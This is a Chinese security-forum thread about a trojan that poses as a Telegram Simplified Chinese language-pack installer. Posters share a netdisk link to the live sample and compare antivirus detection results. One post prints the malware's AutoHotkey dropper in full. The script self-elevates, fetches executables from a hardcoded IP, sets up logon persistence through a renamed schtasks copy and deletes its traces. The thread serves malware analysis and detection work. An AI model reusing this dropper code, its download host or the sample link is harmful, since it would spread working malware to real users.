汉化包变种木马

显示全部楼层 · 发表于前天 17:42

通过网盘分享的文件：点击此处转换简体中文包zh-cn~.msi
链接: https://pan.baidu.com/s/11-6s1Ko-My2Tp4nURD6g8g 提取码: mdnq

显示全部楼层 · 发表于前天 17:49

本帖最后由莒县小哥于 2025-5-7 06:17 编辑

显示全部楼层 · 发表于前天 17:51

火绒扫描miss

显示全部楼层 · 发表于前天 17:51

迈克菲扫描 miss，opentip绿
https://opentip.kaspersky.com/A3 ... /results?tab=upload

显示全部楼层 · 发表于前天 17:59

卡巴斯基扫描miss，KSN未知

显示全部楼层 · 发表于前天 18:02

让人惊叹，dr.web抵御Exploit也就是Dr.Web Shellguard anti-exploit功能，居然成功阻止运行，但由于是Dr.Web Shellguard anti-exploit技术，所以只是阻止MSI文件运行，没有删除样本，这是Dr.Web Shellguard anti-exploit机制，不是BUG

显示全部楼层 · 发表于前天 19:14

本帖最后由 pal家族于 2025-5-6 19:16 编辑

payload下载地址被卡巴拉黑。

已防止访问危险网站
导航到旨在感染您的计算机，降低其性能，破坏系统或造成其他损害的恶意网站已被阻止。

我们保护您不访问此网站。您可以安全地关闭该窗口。

检测时间:

2025-5-6 19:15:21

网址:

http://103.68.181.217/code.zip

阻止者:

安全浏览

原因:

危险网址

检测方法:

数据库

#NoTrayIcon
if not A_IsAdmin
{
try
{
   Run *RunAs "%A_ScriptFullPath%"
   ExitApp
}
catch
{
   ExitApp
}
}

FileCreateDir, C:\Users\Public\403\python

SplitPath, A_ScriptName, OutFileName

if (InStr(OutFileName, "zh-cn", true)) {
Run, TG://setlanguage?lang=classic-zh-cn
}

SendMode Input
SetWorkingDir %A_ScriptDir%

for each_process in ComObjGet("winmgmts:").ExecQuery("Select * from Win32_Process where Name = 'telegram.exe'")
{
telegramPID := each_process.ProcessId
telegramPath := each_process.ExecutablePath

if (telegramPath)
{
      SplitPath, telegramPath,, telegramDir
      Run, "%telegramDir%\telegram.exe" -- tg://setlanguage?lang=classic-zh-cn,, Hide
}
}

Run, cmd /c del C:\Users\Public\403\xz.ahk, , Hide

UrlDownloadToFile, http://103.68.181.217/rar.exe, C:\Users\Public\403\rar.exe
UrlDownloadToFile, http://103.68.181.217/py.zip, C:\Users\Public\403\py.png
UrlDownloadToFile, http://103.68.181.217/code.zip, C:\Users\Public\403\code.zip
UrlDownloadToFile, http://103.68.181.217/wd1.exe, C:\Users\Public\403\wd1.exe
UrlDownloadToFile, http://103.68.181.217/wd1.ahk, C:\Users\Public\403\wd1.ahk

FileCopy, C:\Windows\System32\schtasks.exe, C:\Users\Public\403\cc.exe, 1

Run, C:\Users\Public\403\cc.exe /create /sc onlogon /tn Tahk /rl highest /tr "C:\Users\Public\403\wd1.exe" /F, , Hide

RunWait, C:\Users\Public\403\rar.exe x -y C:\Users\Public\403\Py.png C:\Users\Public\403\python, , Hide

RunWait, "C:\Users\Public\403\rar.exe" x -y C:\Users\Public\403\py.png C:\Users\Public\403\python, , Hide

RunWait, cmd /C DEL C:\Users\Public\403\py.png&del C:\Users\Public\403\cc.exe, , Hide

Run, C:\Users\Public\403\wd1.exe, , Hide

显示全部楼层 · 发表于前天 19:20

驭龙发表于 2025-5-6 18:02
让人惊叹，dr.web抵御Exploit也就是Dr.Web Shellguard anti-exploit功能，居然成功阻止运行，但由于是Dr.We ...

补一个老司机的。

今天，2025/5/6 下午7:17:23;检测到恶意对象;Windows® installer;msiexec.exe;C:\Windows\System32;13036;？？？？？;发起者;检测到: PDM:Trojan.Win32.Generic;检测到;PDM:Trojan.Win32.Generic;木马;高;确切;点击此处转换简体中文包zh-cn~.msi;点击此处转换简体中文包zh-cn~.msi;D:\360极速浏览器X下载;进程;行为分析

显示全部楼层 · 发表于前天 19:22

pal家族发表于 2025-5-6 19:20
补一个老司机的。

今天，2025/5/6 下午7:17:23;检测到恶意对象;Windows® installer;msiexec.exe; ...

实际上俄系中还是卡巴最强，可惜卡巴不爱我

显示全部楼层 · 发表于前天 19:36

[病毒样本] 汉化包变种木马

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块